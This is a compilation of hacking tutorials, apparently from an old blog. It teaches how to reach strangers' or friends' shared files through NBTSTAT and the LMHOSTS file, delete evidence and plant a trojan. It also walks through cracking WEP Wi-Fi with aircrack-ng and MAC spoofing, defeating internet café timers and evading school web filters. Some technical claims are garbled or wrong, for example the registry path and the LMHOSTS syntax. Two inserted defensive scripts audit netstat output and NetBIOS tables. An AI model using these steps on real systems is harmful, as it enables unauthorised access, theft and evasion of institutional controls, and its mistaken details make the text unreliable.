NOTE that the BIOS is not a software program, insofar as it is not purged from
memory when you turn off the computer. It's
firmware, which is basically software on a chip.

A convenient little feature that most BIOS manufacturers include is a startup
password. This prevents access to the system until you enter the correct password.
If you can get access to the system after the password has been entered, then there
are numerous software-based BIOS password extractors available from your local
H/P/A/V site.

NETBIOS/NBTSTAT - What does it do?

2. NETBIOS, also known as NBTSTAT is a program run on the Windows system and is
used for identifying a remote network or computer for file sharing enabled. We can
exploit systems using this method. It may be old but on home PCs sometimes it still
works great. You can use it on your friend at home or something. I don't care what
you do, but remember, that you are reading this document because you want to learn.
So I am going to teach you. Ok. So, you ask, "How do i get to NBTSTAT?" Well, there
are two ways, but one's faster.

Method 1:Start>Programs>MSDOS PROMPT>Type NBTSTAT

Method 2:Start>Run>Type Command>Type NBTSTAT

(Note: Please, help your poor soul if that isn't like feeding you with a baby spoon.)

Ok! Now since you're in the DOS command under NBTSTAT, you're probably
wondering what all that crap is that's on your screen. These are the commands you
may use.

Your screen should look like the following:
NBTSTAT [ [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-RR] [-s] [-S] [interval] ]
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
-c (cache) Lists NBT's cache of remote [machine] names and their IP addresses
-n (names) Lists local NetBIOS names.
-r (resolved) Lists names resolved by broadcast and via WINS
-R (Reload) Purges and reloads the remote cache name table
-S (Sessions) Lists sessions table with the destination IP addresses
-s (sessions) Lists sessions table converting destination IP addresses to computer NETBIOS names.
-RR (ReleaseRefresh) Sends Name Release packets to WINS and then, starts Refresh
RemoteName Remote host machine name.
IP address Dotted decimal representation of the IP address.
interval Redisplays selected statistics, pausing interval seconds between each display. Press Ctrl+C to stop redisplaying statistics.
C:\WINDOWS\DESKTOP>

Only two commands are going to be used, and here they are:
-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.
                                                  Host Names

3. Now, the -a means that you will type in the HOST NAME of the person's computer
that you are trying to access. Just in case you don't have any idea what a Host Name
looks like here's an example.
123-fgh-ppp.internet.com

There are many variations of these addresses. For each different address you see
there is a new ISP assigned to that computer. Look at the difference.

abc-123.internet.com
ghj-789.newnet.com

These are different host names as you can see, and, by identifying the last couple
words you will be able to tell that these are two computers on two different ISPs.
Now, here are two host names on the same ISP but a different located server.
123-fgh-ppp.internet.com
567-cde-ppp.internet.com
                                                    IP Addresses

4. You can resolve these host names to the IP address (Internet Protocol) if you want.
IP addresses range in different numbers. An IP looks like this:
201.123.101.123

Most times you can tell if a computer is running on a cable connection because of the
IP address's numbers. On faster connections, usually the first two numbers are low.
here's a cable connection IP.
24.18.18.10

on dialup connections IP's are higher, like this:
208.148.255.255

notice the 208 is higher than the 24 which is the cable connection.

REMEMBER THOUGH, NOT ALL IP ADDRESSES WILL BE LIKE THIS.

Some companies make IP addresses like this to fool the hacker into believing it's a
dialup, as a hacker would expect something big, like a T3 or an OC-18. Anyway This
gives you an idea on IP addresses which you will be using on the nbtstat command.
                           Getting The IP Through DC (Direct Connection)

5. First. You're going to need to find his IP or host name. Either will work. If you are
on mIRC You can get it by typing /whois (nick) ...where (nick) is the persons nickname
without parenthesis. you will either get a host name or an IP. copy it down. If you do
not get it or you are not using mIRC then you must direct connect to their computer
or you may use a sniffer to figure out his IP or host name. It's actually better to do
it without the sniffer because most sniffers do not work now-a-days. So you want to
establish a direct connection to their computer. OK, what is a direct connection?

When you are:
Sending a file to their computer, you are directly connected.
AOL INSTANT MESSENGER allows a Direct Connection to the user if accepted.
ICQ allows a direct connection when a file transfer or chat request is accepted.
Any time you are sending a file, you are directly connected. (Assuming you know the
user is not using a proxy server.)

Voice Chatting on Yahoo establishes a direct connection.

If you have none of these programs, I suggest you either get one, get a sniffer, or
read this next statement.

If you have any way of sending them a link to your site, and the site has traffic
statistics that you can log in to, send the link, then check the stats and get
the IP of the last visitor. It's a simple and easy method I use. It even fools some
smarter hackers, because it catches them off guard. Anyway, once you are directly
connected, use either of the two methods I showed you earlier and get into DOS. Type
NETSTAT -n. NETSTAT is a program whose name is short for NET STATISTICS. It
will show you all computers connected to yours. (This is also helpful if you think you
are being hacked by a trojan horse that is on a port you know, such as Sub Seven:
27374.)

Your screen should look like this showing the connections to your computer:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 205.188.8.7:26778 ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------
The first column indicates the protocol (language) that is being used by the two
computers.

TCP (Transmission Control Protocol) is being used here and is the most widely used.
Local address shows your IP address, or the IP address of the system you are on.
Foreign address shows the address of the computer connected to yours.

State tells you what kind of connection is being made. ESTABLISHED means it will
stay connected to you as long as you are on the program or as long as the computer is
allowing or needing the other computer's connection to it. CLOSE_WAIT means the
connection closes at times and waits until it is needed or until you resume the
connection. One that isn't on the list is TIME_WAIT, which means it is timed. Most
ads that run on AOL are using TIME_WAIT states.
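
The defensive use mentioned above (checking your own connections for a known trojan port) can be scripted. This is an added example, not part of the original tutorial: it parses output in the layout shown above and flags any row that touches a watched port. The sample rows and the names `WATCH_PORTS`, `parse_netstat` and `flag_watched_ports` are constructed for illustration; only port 27374 comes from the text.

```python
from collections import Counter

# Constructed sample in the layout shown above; addresses are documentation ranges.
SAMPLE = """\
Active Connections
Proto Local Address Foreign Address State
TCP 192.0.2.10:1027 198.51.100.46:5190 ESTABLISHED
TCP 192.0.2.10:27374 203.0.113.75:4012 ESTABLISHED
TCP 192.0.2.10:1621 198.51.100.9:80 CLOSE_WAIT
TCP 192.0.2.10:1413 abc-123-ppp.example.net ESTABLISHED
TCP 192.0.2.10:1500 203.0.113.8:80 TIME_WAIT
"""

# Ports to watch for. 27374 is the Sub Seven port named in the text; extend as needed.
WATCH_PORTS = {27374: "Sub Seven"}


def split_endpoint(endpoint):
    """Split 'host:port' into (host, port); port is None when absent or non-numeric."""
    host, sep, port = endpoint.rpartition(":")
    if sep and port.isdigit():
        return host, int(port)
    return endpoint, None


def parse_netstat(text):
    """Turn the connection rows of netstat output into dictionaries."""
    rows = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, column header, prompt or blank line
        local_host, local_port = split_endpoint(parts[1])
        remote_host, remote_port = split_endpoint(parts[2])
        rows.append({
            "proto": parts[0],
            "local_host": local_host, "local_port": local_port,
            "remote_host": remote_host, "remote_port": remote_port,
            "state": parts[3] if len(parts) > 3 else "",
        })
    return rows


def flag_watched_ports(rows, watch=WATCH_PORTS):
    """Return (label, direction, row) for every row that touches a watched port."""
    findings = []
    for row in rows:
        if row["local_port"] in watch:
            # A remote peer is talking to the watched port on this machine.
            findings.append((watch[row["local_port"]], "inbound", row))
        elif row["remote_port"] in watch:
            # This machine is talking to the watched port on a remote peer.
            findings.append((watch[row["remote_port"]], "outbound", row))
    return findings


def state_counts(rows):
    """Count connections per state, as a quick summary of the table."""
    return Counter(row["state"] for row in rows)


if __name__ == "__main__":
    connections = parse_netstat(SAMPLE)
    for label, direction, row in flag_watched_ports(connections):
        print("ALERT", label, direction, row["remote_host"], row["state"])
    print(dict(state_counts(connections)))
```
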

The way you know the person is directly connected to your computer is because of
this:
------------------------------------------------------------------------------------------------
C:\WINDOWS\DESKTOP>netstat -n
Active Connections
Proto Local Address Foreign Address State
TCP 172.255.255.82:1027 205.188.68.46:13784 ESTABLISHED
TCP 172.255.255.82:1036 205.188.44.3:5190 ESTABLISHED
TCP 172.255.255.82:1621 24.131.30.75:66 CLOSE_WAIT
TCP 172.255.255.82:1413 abc-123-ppp.webnet.com ESTABLISHED
TCP 172.255.255.82:1483 64.4.13.209:1863 ESTABLISHED
C:\WINDOWS\DESKTOP>
------------------------------------------------------------------------------------------------

Notice that the fourth line shows a host name instead of an IP address like all the others.
This is almost ALWAYS the other computer that is connected to you. So here, now,
you have the host name:

abc-123-ppp.webnet.com

If the host name is not listed and the IP is, then it is NO PROBLEM because either one
works exactly the same. I am using the abc-123-ppp.webnet.com host name as an example.
Ok, so now you have the IP and/or host name of the remote system you want to
connect to. Time to hack!

Open up your DOS command. Open up NBTSTAT by typing NBTSTAT. Ok, there's
the crap again. Well, now it's time to try out what you have learned from this document
by testing it on the IP and/or host name of the remote system. Here's the only thing
you'll need to know.

IMPORTANT, READ NOW!!!

-a (adapter status) Lists the remote machine's name table given its name
-A (Adapter status) Lists the remote machine's name table given its IP address.

Remember this?
Time to use it.
-a will be the host name
-A will be the IP

How do I know this?

Read the statements following the -a and -A commands. They tell you what each
command takes.

So have you found which one you have to use?
GOOD!
Time to start.
                                          Using it to your advantage

6. Type this if you have the host name only.

NBTSTAT -a (In here put in hostname without parentheses)

Type this if you have the IP address only.

NBTSTAT -A (In here put in IP address without parentheses)

Now hit enter and wait. One of two things will come up:

1. Host not found

2. Something that looks like this:
--------------------------------------------
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
---------------------------------------------
If the computer responded "Host not found", then one of two things is the
case:

1. You screwed up the host name.

2. The host is not hackable.

If number one is the case you're in great luck. If two, this system isn't hackable
using the NBTSTAT command. So try another system.

If you got a table like the one above to come up, look at it carefully as I describe each
part and its purpose.

Name - states the share name of that certain part of the computer
<00>, <03>, <20>, <1E> - are the hexadecimal codes giving you the services available on
that share name.

Type - is self-explanatory. It's either turned on, or activated by you, or always on.
Status - simply states that the share name is working and is activated.

Look above and look for the following line:
GMVPS01 <20> UNIQUE Registered
See it?

GOOD! Now this is important, so listen up. The hexadecimal code of <20> means that
file sharing is enabled on the share name that is on that line with the hex number. So
that means GMVPS01 has file sharing enabled. So now you want to hack this. Here's
how to do it. (This is the hard part.)
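
Read from the owner's side, the same table tells you whether your own machine is advertising file sharing. The following is an added example, not part of the original tutorial: it parses the name table shown above and reports any registered <20> entry. The function names are made up for illustration, the suffix descriptions are the standard Microsoft assignments for these codes, and the second table is constructed.

```python
import re

# The name table shown above, copied from the text.
TABLE = """\
NetBIOS Local Name Table
Name Type Status
---------------------------------------------
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
GMVPS01 <03> UNIQUE Registered
GMVPS01 <20> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
"""

# Constructed table for a machine with file sharing turned off (no <20> entry).
TABLE_NO_SHARING = """\
GMVPS01 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
"""

# Standard meanings of the suffix codes that appear in the table above.
SUFFIX_MEANING = {
    ("00", "UNIQUE"): "Workstation service (computer name)",
    ("00", "GROUP"): "Workgroup or domain name",
    ("03", "UNIQUE"): "Messenger service",
    ("20", "UNIQUE"): "File Server service (file and printer sharing)",
    ("1E", "GROUP"): "Browser service elections",
}

# name, <hex suffix>, UNIQUE or GROUP, status
ROW = re.compile(r"^\s*(.+?)\s*<([0-9A-Fa-f]{2})>\s+(UNIQUE|GROUP)\s+(\S+)\s*$")


def parse_name_table(text):
    """Return one dictionary per name-table row; headers and rules are skipped."""
    entries = []
    for line in text.splitlines():
        match = ROW.match(line)
        if not match:
            continue
        name, suffix, kind, status = match.groups()
        suffix = suffix.upper()
        entries.append({
            "name": name, "suffix": suffix, "type": kind, "status": status,
            "meaning": SUFFIX_MEANING.get((suffix, kind), "not in this lookup"),
        })
    return entries


def file_sharing_names(entries):
    """Names that have the File Server service (<20>) registered."""
    return sorted({e["name"] for e in entries
                   if e["suffix"] == "20" and e["type"] == "UNIQUE"
                   and e["status"].lower() == "registered"})


def audit(text):
    """Return (entries, verdict) for one name table."""
    entries = parse_name_table(text)
    exposed = file_sharing_names(entries)
    if exposed:
        return entries, "file sharing advertised by: " + ", ".join(exposed)
    return entries, "no <20> name registered"


if __name__ == "__main__":
    for entry in audit(TABLE)[0]:
        print(entry["name"], "<" + entry["suffix"] + ">", entry["meaning"])
    print(audit(TABLE)[1])
    print(audit(TABLE_NO_SHARING)[1])
```

If the audit reports a <20> name on a machine that should not be sharing files, turn off File and Printer Sharing on that network adapter and block NetBIOS at the firewall.
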
                                                  LMHOST File

7. There is a file in all Windows systems called LMHOST.sam. We simply need to add
the IP into the LMHOST file because LMHOST basically acts as a network,
automatically logging you on to it. So go to Start, Find, Files or Folders. Type in
LMHOST and hit enter. When it comes up, open it using a text program such as
WordPad, but make sure you do not leave the checkmark on "always open files with
this extension". Simply go through the LMHOST file until you see the part:
# This file is compatible with Microsoft LAN Manager 2.x TCP/IP lmhosts
# files and offers the following extensions:
#
# #PRE
# #DOM:
# #INCLUDE
# #BEGIN_ALTERNATE
# #END_ALTERNATE
# \0xnn (non-printing character support)
#
# Following any entry in the file with the characters "#PRE" will cause
# the entry to be preloaded into the name cache. By default, entries are
# not preloaded, but are parsed only after dynamic name resolution fails.
#
# Following an entry with the "#DOM:" tag will associate the
# entry with the domain specified by . This affects how the
# browser and logon services behave in TCP/IP environments. To preload
# the host name associated with #DOM entry, it is necessary to also add a
# #PRE to the line. The is always preloaded although it will not
# be shown when the name cache is viewed.
#
# Specifying "#INCLUDE " will force the RFC NetBIOS (NBT)
# software to seek the specified and parse it as if it were
# local. is generally a UNC-based name, allowing a
# centralized lmhosts file to be maintained on a server.
# It is ALWAYS necessary to provide a mapping for the IP address of the
# server prior to the #INCLUDE. This mapping must use the #PRE directive.
# In addtion the share "public" in the example below must be in the
# LanManServer list of "NullSessionShares" in order for client machines to
# be able to read the lmhosts file successfully. This key is under
# \machine\system\currentcontrolset\services\lanmanserver\parameters\nullsessionshares
# in the registry. Simply add "public" to the list found there.
#
# The #BEGIN_ and #END_ALTERNATE keywords allow multiple #INCLUDE
# statements to be grouped together. Any single successful include
# will cause the group to succeed.
#
# Finally, non-printing characters can be embedded in mappings by
# first surrounding the NetBIOS name in quotations, then using the
# \0xnn notation to specify a hex value for a non-printing character.

Read this over and over until you understand the way you want your connection to be
set. Here's an example of how to add an IP the way I would do it:
#PRE #DOM:255.102.255.102 #INCLUDE

PRE will preload the connection as soon as you log on to the net. DOM is the domain or
IP address of the host you are connecting to. INCLUDE will automatically set you to
that file path. In this case, as soon as I log on to the net I will get access to
255.102.255.102 on the C:/ drive. The only problem with this is that the other person
can run the NETSTAT command while you are connected and get the IP of your machine.
That's why it only works on simple PC machines, because people these days are computer
illiterate and have no idea what these commands can do. They have no idea what
NETSTAT is, so you can use that to your advantage. Most PC systems are kind of
hard to hack using this method now because they are more secure and can tell when
another system is trying to gain access. Also, be sure that you (somehow) know
whether they are running a firewall or not, because it will block the connection to
their computer. Most home systems aren't running a firewall, and to make it better,
they don't know how to operate the firewall, therefore leaving the hole in the system.

To help you out some, it would be a great idea to pick up some programming
languages to show you how the computer reads information, and to learn some things about
TCP/IP (Transmission Control Protocol/Internet Protocol). If you want to find out
whether they are running a firewall, simply hop on a proxy and do a port scan on their
IP. You will notice if they are running a firewall because most ports are closed. Either
way, you still have a better chance of hacking a home system than hacking Microsoft.

                                                       Gaining Access

7. Once you have added this to your LMHOST file, you are basically done. All you need
to do is go to:
Start
Find
Computer
Once you get there you simply type the IP address or the host name of the system.
When it comes up, simply double click it, and boom! There's a GUI for you so you
don't have to use DOS anymore. You can use DOS to do it, but it's simpler and more
fun this way, so that's the only way I put it. When you open the system you can edit,
delete, rename, do anything to any file you wish. I would also delete the command file
in C:/ because they may use it if they think someone is in their computer. Or simply
delete the shortcut to it. Then here's when the programming comes in handy. Instead
of using the NBTSTAT method all the time, you can then program your own trojan on
your OWN port number and upload it to the system. Then you will have easier access
and you will also have a better GUI, with more features. DO NOT allow more than one
connection to the system unless they are on a faster connection. If you are
downloading something from their computer and they don't know it and their
connection is being slow, they may check their NETSTAT to see what is connected,
which will show your IP and make them suspicious. That's it. That's all there is to it. Now go
out and scan a network or something and find a computer with port 21 or something
open.

Hacking WEP wifi passwords


1. Getting the right tools

Download Backtrack 3. It can be found here:

http://www.remote-exploit.org/backtrack_download.html

The Backtrack 4 beta is out but until it is fully tested (especially if you are a noob) I
would get the BT3 setup. The rest of this guide will proceed assuming you downloaded
BT3. I downloaded the CD iso and burned it to a cd. Insert your BT3 cd/usb drive and
reboot your computer into BT3. I always load into the 3rd boot option from the boot
menu. (VESA/KDE) You only have a few seconds before it auto-boots into the 1st
option so be ready. The 1st option boots too slowly or not at all so always boot from
the 2nd or 3rd. Experiment to see what works best for you.
2. Preparing the victim network for attack

Once in BT3, click the tiny black box in the lower left corner to load up a "Konsole"
window. Now we must prep your wireless card.

Type:
airmon-ng

You will see the name of your wireless card. (mine is named "ath0") From here on out,
replace "ath0" with the name of your card.
Now type:

airmon-ng stop ath0
then type:
ifconfig wifi0 down
then:
macchanger --mac 00:11:22:33:44:55 wifi0
then:
airmon-ng start wifi0

What these steps did was to spoof (fake) your MAC address so that JUST IN CASE
your computer is discovered by someone as you are breaking in, they will not see your
REAL MAC address. Moving on...

Now it's time to discover some networks to break into.
Type:
airodump-ng ath0

Now you will see a list of wireless networks start to populate. Some will have a better
signal than others and it is a good idea to pick one that has a decent signal otherwise
it will take forever to crack or you may not be able to crack it at all.
Once you see the network that you want to crack, do this:
hold down ctrl and tap c

This will stop airodump from populating networks and will freeze the screen so that
you can see the info that you need.

**Now from here on out, when I tell you to type a command, you need to replace
whatever is in parentheses with what I tell you to from your screen. For example: if I
say to type:
-c (channel)
then don't actually type in
-c (channel)

Instead, replace that with whatever the channel number is...so, for example you would
type:
-c 6
Can't be much clearer than that...let's continue...

Now find the network that you want to crack and MAKE SURE that it says the
encryption for that network is WEP. If it says WPA or any variation of WPA then
move on...you can still crack WPA with backtrack and some other tools but it is a
whole other ball game and you need to master WEP first.

Once you've decided on a network, take note of its channel number and bssid. The
bssid will look something like this --> 05:gk:30:fo:s9:2n
The Channel number will be under a heading that says "CH".
Now, in the same Konsole window, type:
airodump-ng -c (channel) -w (file name) --bssid (bssid) ath0

The FILE NAME can be whatever you want. This is simply the place where airodump is
going to store the packets of info that you receive, to crack later. You don't even put
in an extension...just pick a random word that you will remember. I usually make mine
"wepkey" because I can always remember it.

**Side Note: if you crack more than one network in the same session, you must have
different file names for each one or it won't work. I usually just name them wepkey1,
wepkey2, etc.

Once you typed in that last command, the screen of airodump will change and start to
show your computer gathering packets. You will also see a heading marked "IV" with a
number underneath it. This stands for "Initialization Vector" but in noob terms all
this means is "packets of info that contain clues to the password." Once you gain a
minimum of 5,000 of these IV's, you can try to crack the password.

I've cracked some right at 5,000 and others have taken over 60,000. It just depends
on how long and difficult they made the password.

Now you are thinking, "I'm screwed because my IV's are going up really slowly." Well,
don't worry, now we are going to trick the router into giving us HUNDREDS of IV's
per second.

3. Actually cracking the WEP password
Now leave this Konsole window up and running and open up a 2nd Konsole window. In
this one type:
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 ath0

This will generate a bunch of text and then you will see a line where your computer is
gathering a bunch of packets and waiting on ARP and ACK. Don't worry about what
these mean...just know that these are your meal tickets. Now you just sit and wait.
Once your computer finally gathers an ARP request, it will send it back to the router
and begin to generate hundreds of ARP and ACK per second. Sometimes this starts to
happen within seconds...sometimes you have to wait up to a few minutes. Just be
patient. When it finally does happen, switch back to your first Konsole window and
you should see the number underneath the IV starting to rise rapidly. This is great!
It means you are almost finished! When this number reaches AT LEAST 5,000 then
you can start your password crack. It will probably take more than this but I always
start my password cracking at 5,000 just in case they have a really weak password.
Now you need to open up a 3rd and final Konsole window. This will be where we
actually crack the password. Type:

aircrack-ng -b (bssid) (filename)-01.cap

Remember the filename you made up earlier? Mine was "wepkey". Don't put a space in
between it and -01.cap here. Type it as you see it. So for me, I would type
wepkey-01.cap

Once you have done this you will see aircrack fire up and begin to crack the password.
Typically you have to wait for more like 10,000 to 20,000 IV's before it will crack. If
this is the case, aircrack will test what you've got so far and then it will say
something like "not enough IV's. Retry at 10,000." DON'T DO ANYTHING! It will
stay running...it is just letting you know that it is on pause until more IV's are
gathered. Once you pass the 10,000 mark it will automatically fire up again and try to
crack it. If this fails it will say "not enough IV's. Retry at 15,000." and so on until it
finally gets it.

If you do everything correctly up to this point, before too long you will have the
password! Now if the password looks goofy, don't worry, it will still work. Some
passwords are saved in ASCII format, in which case aircrack will show you exactly
what characters they typed in for their password. Sometimes, though, the password
is saved in HEX format, in which case the computer will show you the HEX encryption
of the password. It doesn't matter either way, because you can type in either one
and it will connect you to the network.

Take note, though, that the password will always be displayed in aircrack with a colon
after every 2 characters. So for instance if the password was "secret", it would be
displayed as:

se:cr:et

This would obviously be the ASCII format. If it was a HEX encrypted password that
was something like "0FKW9427VF" then it would still display as:
0F:KW:94:27:VF

Just omit the colons from the password, boot back into whatever operating system
you use, try to connect to the network and type in the password without the colons
and presto! You are in!

It may seem like a lot to deal with if you have never done it, but after a few
successful attempts, you will get very quick with it. If I am near a WEP encrypted
router with a good signal, I can often crack the password in just a couple of minutes.
I am not responsible for what you do with this information. Any malicious/illegal
activity that you do, falls completely on you because...technically...this is just for you
to test the security of your own network. :-)

I will gladly answer any legitimate questions anyone has to the best of my ability.
HOWEVER, I WILL NOT ANSWER ANYONE THAT IS TOO LAZY TO READ THE
WHOLE TUT AND JUST ASKS ME SOME QUESTION THAT I CLEARLY
ANSWERED. No one wants to hold your hand through this...read the tut and go
experiment until you get it right.

There are rare occasions where someone will use WEP encryption with SKA as well.
(Shared Key Authentication) If this is the case, additional steps are needed to
associate with the router and therefore, the steps I lined out here will not work. I've
only seen this once or twice, though, so you probably won't run into it. If I get
motivated, I may throw up a tut on how to crack this in the future.

Sunday, 7 October 2012

How to get unlimited time in Internet Café's

Today we're going to learn how to disable the timer on the computers in Internet
Cafe's.

Let's go through the steps, shall we?

1. Create a New Text Document.
2. Then type CMD in it.

3. And then save it as anything.bat
(Make sure the file name does NOT end in .txt, but in .bat)
4. Go to the location where you saved the .bat file and run it. If you've done this
correctly, you'll see that Command Prompt is open.

5. Now that Command Prompt is open, type in: cd\windows
(This will change the directory to Windows)
6. Then type in: regedit
(This will get you to the registry editor gui)

7. Now navigate to:
HKEY_CURRENT_USER>Appevents>software>classes>microsoft>windows>current
version>internet settings>policies>system

8. Then on the right pane where it says Disable Taskmanager, right click on it,
scroll down to modify, and then change the value of it to "0".

9. And then open Windows Task Manager
(CTRL+ALT+DELETE)

10. And then disable the Internet Cafe's timer.

If you did this right, then you're done! Well done :D

How to get past your school blocking system without programs


Right, first off, you need to go onto: http://g.ho.st/

This is a virtual machine/computer that your sysadmins shouldn't have blocked. At
my school, our security is pretty high because of people like me and you. After you
are on the website, it should look like this:

Ok, now you click on the big button that says: Start. Then, after that, you should see
another screen that looks like this:

Now make an account; you should see the register button. I have made an account
(trust me, it is easy). After you have logged in, you should see another screen that
looks something like this:

After you have logged in, you should try to get on the g.ho.st internet (alpha). To
get on the internet, follow these commands.
On the desktop, click on the icon that says: find cool web stuff.
Then click the icon that says: Web.
Now go to: Ghost services.
And there should be an icon that says: G.ho.st browser (alpha).
(If you go on a website, and it says: open in a new tab because this site will function
better (or something like that), don't do it. But if you want to, just do it.)